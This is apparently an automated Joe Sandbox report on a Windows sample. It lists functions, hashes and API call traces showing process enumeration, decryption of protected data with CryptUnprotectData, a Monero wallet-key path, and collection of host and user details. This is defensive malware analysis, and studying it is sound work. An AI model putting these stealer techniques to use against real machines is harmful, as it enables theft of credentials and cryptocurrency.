Associated: 00000000.00000002.1937128735.000000000128C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_be0000_file.jbxd

Yara matches

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: 6858b816f69b9d8ab0552f5ee45eef92fa0c1c7b6f73b7c7d49702635cfaf008
Instruction ID: fa70b9869641818f0e0350bde286080e6ae36d47a916c1fe52181881b0f655ea
Opcode Fuzzy Hash: 6858b816f69b9d8ab0552f5ee45eef92fa0c1c7b6f73b7c7d49702635cfaf008
Instruction Fuzzy Hash: 0201E975A00208AFCB24DFA5C988BEDB7F8EB48300F144199AA05E7240DB749A49CF51

Function 00BF8680 Relevance: 6.1, APIs: 4, Instructions: 77processCOMMON

Download Yara Rule

APIs

Part of subcall function 00BFA740: lstrcpy.KERNEL32(00C00E17,00000000), ref: 00BFA788

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00C005B7), ref: 00BF86CA
Process32First.KERNEL32(?,00000128), ref: 00BF86DE
Process32Next.KERNEL32(?,00000128), ref: 00BF86F3

Part of subcall function 00BFA9B0: lstrlen.KERNEL32(?,01739040,?,\Monero\wallet.keys,00C00E17), ref: 00BFA9C5
Part of subcall function 00BFA9B0: lstrcpy.KERNEL32(00000000), ref: 00BFAA04
Part of subcall function 00BFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00BFAA12

Part of subcall function 00BFA8A0: lstrcpy.KERNEL32(?,00C00E17), ref: 00BFA905

CloseHandle.KERNEL32(?), ref: 00BF8761

Memory Dump Source

Source File: 00000000.00000002.1936479595.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000000.00000002.1936446052.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C3A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C68000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C72000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CEF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DAB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000FCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937018615.00000000010E9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937116692.000000000128B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937128735.000000000128C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_be0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
String ID:
API String ID: 1066202413-0
Opcode ID: cc2501a22999b132fa65c96ddb9d81220084a15873002b936d781036bde432a8
Instruction ID: 2721d3a298d100a99d0000a4da1b83206b107a100b47dde2ceea4bfe1468114a
Opcode Fuzzy Hash: cc2501a22999b132fa65c96ddb9d81220084a15873002b936d781036bde432a8
Instruction Fuzzy Hash: D4310CB190111CABCB28EB55DC45FEEB7B8EB45740F1041E9A60DA71A0DB706E49CFA1

Function 00BF7A30 Relevance: 6.0, APIs: 4, Instructions: 49memorytimeCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,0173E120,00000000,?,00C00E10,00000000,?,00000000,00000000), ref: 00BF7A63
RtlAllocateHeap.NTDLL(00000000), ref: 00BF7A6A
GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,0173E120,00000000,?,00C00E10,00000000,?,00000000,00000000,?), ref: 00BF7A7D
wsprintfA.USER32 ref: 00BF7AB7

Memory Dump Source

Source File: 00000000.00000002.1936479595.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000000.00000002.1936446052.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C3A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C68000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C72000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CEF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DAB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000FCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937018615.00000000010E9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937116692.000000000128B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937128735.000000000128C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_be0000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateInformationProcessTimeZonewsprintf
String ID:
API String ID: 3317088062-0
Opcode ID: c66cb8990f81e9b83b18de32e0db407e19638ad7d22a593fd06bc5a7753ef685
Instruction ID: 5b9df395f362de523ca35460c00fce771d7badd61c446b9fbd81b316e4305c5d
Opcode Fuzzy Hash: c66cb8990f81e9b83b18de32e0db407e19638ad7d22a593fd06bc5a7753ef685
Instruction Fuzzy Hash: F71182B1A45218DFDB248F55DC49F69B7B8F704711F1043E6E606A32C0D7741A45CF51

Function 00BE9B60 Relevance: 4.6, APIs: 3, Instructions: 51memoryencryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00BE9B84
LocalAlloc.KERNEL32(00000040,00000000), ref: 00BE9BA3
LocalFree.KERNEL32(?), ref: 00BE9BD3

Memory Dump Source

Source File: 00000000.00000002.1936479595.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000000.00000002.1936446052.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C3A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C68000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C72000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CEF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DAB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000FCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937018615.00000000010E9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937116692.000000000128B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937128735.000000000128C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_be0000_file.jbxd

Yara matches

Similarity

API ID: Local$AllocCryptDataFreeUnprotect
String ID:
API String ID: 2068576380-0
Opcode ID: 9f7cc4dafa0cb8aa9fe7ace4b9bbb0e055a9bc7402b71f70e9f96204ebe7b27e
Instruction ID: 410be4a4a4137fcb43c220d9e6284adc03b920c350d116737f114f5c5fe09b32
Opcode Fuzzy Hash: 9f7cc4dafa0cb8aa9fe7ace4b9bbb0e055a9bc7402b71f70e9f96204ebe7b27e
Instruction Fuzzy Hash: D6110CB8A00209DFDB04DF95D985AAE77F5FF88300F1045A8E815A7350D774AE55CF61

Function 00BF78E0 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 00BF7910
RtlAllocateHeap.NTDLL(00000000), ref: 00BF7917
GetComputerNameA.KERNEL32(?,00000104), ref: 00BF792F

Memory Dump Source

Source File: 00000000.00000002.1936479595.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000000.00000002.1936446052.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C3A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C68000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C72000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CEF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DAB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000FCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937018615.00000000010E9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937116692.000000000128B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937128735.000000000128C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_be0000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateComputerNameProcess
String ID:
API String ID: 1664310425-0
Opcode ID: c31a17e05d61335d095dc370acf3c0cd118ef01299f07375835d4a93e0c5ed56
Instruction ID: ce23476f38220376d446839097168cc72277eec35bfec7de7f6281aa1fe7386d
Opcode Fuzzy Hash: c31a17e05d61335d095dc370acf3c0cd118ef01299f07375835d4a93e0c5ed56
Instruction Fuzzy Hash: 7D0186B1A44209EFC714DF95DD49BAABBF8F704B11F1042A9FA45E3280C77459088BA1

Function 00BF7850 Relevance: 4.5, APIs: 3, Instructions: 36memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00BE11B7), ref: 00BF7880
RtlAllocateHeap.NTDLL(00000000), ref: 00BF7887
GetUserNameA.ADVAPI32(00000104,00000104), ref: 00BF789F

Memory Dump Source

Source File: 00000000.00000002.1936479595.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000000.00000002.1936446052.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C3A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C68000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C72000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CEF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DAB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000FCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937018615.00000000010E9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937116692.000000000128B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937128735.000000000128C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_be0000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateNameProcessUser
String ID:
API String ID: 1296208442-0
Opcode ID: d2d5ad6205156b2d85cfecb809c552be64a099e4007bffdb46476c5bd1273fb5
Instruction ID: 2dd80735fedbcade2cc53881cad734c5eacd997a10a005f54314c45e0a35fb0e
Opcode Fuzzy Hash: d2d5ad6205156b2d85cfecb809c552be64a099e4007bffdb46476c5bd1273fb5
Instruction Fuzzy Hash: E2F04FB1944208AFC714DF99DD49FAEBBB8EB04711F10066AFA05A3680C77415098BA1

Function 00BE1160 Relevance: 3.0, APIs: 2, Instructions: 15COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(?), ref: 00BE116A
ExitProcess.KERNEL32 ref: 00BE117E

Memory Dump Source

Source File: 00000000.00000002.1936479595.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000000.00000002.1936446052.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C3A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C68000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C72000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CEF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DAB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000FCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937018615.00000000010E9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937116692.000000000128B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937128735.000000000128C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_be0000_file.jbxd

Yara matches

Similarity

API ID: ExitInfoProcessSystem
String ID:
API String ID: 752954902-0
Opcode ID: 8e0fd0475ec40635d1b827e5e1140223e341750799a386d355e80c8baca360df
Instruction ID: 199b9b0c0a02126d4a22f9ff89cbc96f2f3ac75302b029d01ceef7830a97683f
Opcode Fuzzy Hash: 8e0fd0475ec40635d1b827e5e1140223e341750799a386d355e80c8baca360df
Instruction Fuzzy Hash: 31D05E7490030CDFCB10DFE1DC496EDBBB8FB08311F1405A5D90572340EA305486CAAA

Function 00BF9C10 Relevance: 200.2, APIs: 112, Strings: 2, Instructions: 684
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32(74DD0000,01725808), ref: 00BF9C2D
GetProcAddress.KERNEL32(74DD0000,017256E8), ref: 00BF9C45
GetProcAddress.KERNEL32(74DD0000,017396A0), ref: 00BF9C5E
GetProcAddress.KERNEL32(74DD0000,01739688), ref: 00BF9C76
GetProcAddress.KERNEL32(74DD0000,01739658), ref: 00BF9C8E
GetProcAddress.KERNEL32(74DD0000,01739670), ref: 00BF9CA7
GetProcAddress.KERNEL32(74DD0000,0172B858), ref: 00BF9CBF
GetProcAddress.KERNEL32(74DD0000,0173D180), ref: 00BF9CD7
GetProcAddress.KERNEL32(74DD0000,0173D240), ref: 00BF9CF0
GetProcAddress.KERNEL32(74DD0000,0173D1C8), ref: 00BF9D08
GetProcAddress.KERNEL32(74DD0000,0173D1E0), ref: 00BF9D20
GetProcAddress.KERNEL32(74DD0000,01725828), ref: 00BF9D39
GetProcAddress.KERNEL32(74DD0000,017259A8), ref: 00BF9D51
GetProcAddress.KERNEL32(74DD0000,01725848), ref: 00BF9D69
GetProcAddress.KERNEL32(74DD0000,01725868), ref: 00BF9D82
GetProcAddress.KERNEL32(74DD0000,0173D2E8), ref: 00BF9D9A
GetProcAddress.KERNEL32(74DD0000,0173D2D0), ref: 00BF9DB2
GetProcAddress.KERNEL32(74DD0000,0172BA10), ref: 00BF9DCB
GetProcAddress.KERNEL32(74DD0000,017259C8), ref: 00BF9DE3
GetProcAddress.KERNEL32(74DD0000,0173D300), ref: 00BF9DFB
GetProcAddress.KERNEL32(74DD0000,0173D1F8), ref: 00BF9E14
GetProcAddress.KERNEL32(74DD0000,0173D198), ref: 00BF9E2C
GetProcAddress.KERNEL32(74DD0000,0173D1B0), ref: 00BF9E44
GetProcAddress.KERNEL32(74DD0000,01725888), ref: 00BF9E5D
GetProcAddress.KERNEL32(74DD0000,0173D318), ref: 00BF9E75
GetProcAddress.KERNEL32(74DD0000,0173D210), ref: 00BF9E8D
GetProcAddress.KERNEL32(74DD0000,0173D330), ref: 00BF9EA6
GetProcAddress.KERNEL32(74DD0000,0173D168), ref: 00BF9EBE
GetProcAddress.KERNEL32(74DD0000,0173D228), ref: 00BF9ED6
GetProcAddress.KERNEL32(74DD0000,0173D348), ref: 00BF9EEF
GetProcAddress.KERNEL32(74DD0000,0173D450), ref: 00BF9F07
GetProcAddress.KERNEL32(74DD0000,0173D258), ref: 00BF9F1F
GetProcAddress.KERNEL32(74DD0000,0173D270), ref: 00BF9F38
GetProcAddress.KERNEL32(74DD0000,0173A430), ref: 00BF9F50
GetProcAddress.KERNEL32(74DD0000,0173D420), ref: 00BF9F68
GetProcAddress.KERNEL32(74DD0000,0173D3C0), ref: 00BF9F81
GetProcAddress.KERNEL32(74DD0000,017259E8), ref: 00BF9F99
GetProcAddress.KERNEL32(74DD0000,0173D288), ref: 00BF9FB1
GetProcAddress.KERNEL32(74DD0000,017258C8), ref: 00BF9FCA
GetProcAddress.KERNEL32(74DD0000,0173D2A0), ref: 00BF9FE2
GetProcAddress.KERNEL32(74DD0000,0173D360), ref: 00BF9FFA
GetProcAddress.KERNEL32(74DD0000,017258E8), ref: 00BFA013
GetProcAddress.KERNEL32(74DD0000,01725C28), ref: 00BFA02B
LoadLibraryA.KERNEL32(0173D2B8,?,00BF5CA3,00C00AEB,?,?,?,?,?,?,?,?,?,?,00C00AEA,00C00AE3), ref: 00BFA03D
LoadLibraryA.KERNEL32(0173D438,?,00BF5CA3,00C00AEB,?,?,?,?,?,?,?,?,?,?,00C00AEA,00C00AE3), ref: 00BFA04E
LoadLibraryA.KERNEL32(0173D378,?,00BF5CA3,00C00AEB,?,?,?,?,?,?,?,?,?,?,00C00AEA,00C00AE3), ref: 00BFA060
LoadLibraryA.KERNEL32(0173D390,?,00BF5CA3,00C00AEB,?,?,?,?,?,?,?,?,?,?,00C00AEA,00C00AE3), ref: 00BFA072
LoadLibraryA.KERNEL32(0173D3A8,?,00BF5CA3,00C00AEB,?,?,?,?,?,?,?,?,?,?,00C00AEA,00C00AE3), ref: 00BFA083
LoadLibraryA.KERNEL32(0173D3D8,?,00BF5CA3,00C00AEB,?,?,?,?,?,?,?,?,?,?,00C00AEA,00C00AE3), ref: 00BFA095
LoadLibraryA.KERNEL32(0173D3F0,?,00BF5CA3,00C00AEB,?,?,?,?,?,?,?,?,?,?,00C00AEA,00C00AE3), ref: 00BFA0A7
LoadLibraryA.KERNEL32(0173D408,?,00BF5CA3,00C00AEB,?,?,?,?,?,?,?,?,?,?,00C00AEA,00C00AE3), ref: 00BFA0B8
GetProcAddress.KERNEL32(75290000,01725CC8), ref: 00BFA0DA
GetProcAddress.KERNEL32(75290000,0173D618), ref: 00BFA0F2
GetProcAddress.KERNEL32(75290000,01739130), ref: 00BFA10A
GetProcAddress.KERNEL32(75290000,0173D588), ref: 00BFA123
GetProcAddress.KERNEL32(75290000,01725D68), ref: 00BFA13B
GetProcAddress.KERNEL32(6FDD0000,0172BA88), ref: 00BFA160
GetProcAddress.KERNEL32(6FDD0000,01725BA8), ref: 00BFA179
GetProcAddress.KERNEL32(6FDD0000,0172BAB0), ref: 00BFA191
GetProcAddress.KERNEL32(6FDD0000,0173D600), ref: 00BFA1A9
GetProcAddress.KERNEL32(6FDD0000,0173D540), ref: 00BFA1C2
GetProcAddress.KERNEL32(6FDD0000,01725AC8), ref: 00BFA1DA
GetProcAddress.KERNEL32(6FDD0000,01725C08), ref: 00BFA1F2
GetProcAddress.KERNEL32(6FDD0000,0173D468), ref: 00BFA20B
GetProcAddress.KERNEL32(752C0000,01725D88), ref: 00BFA22C
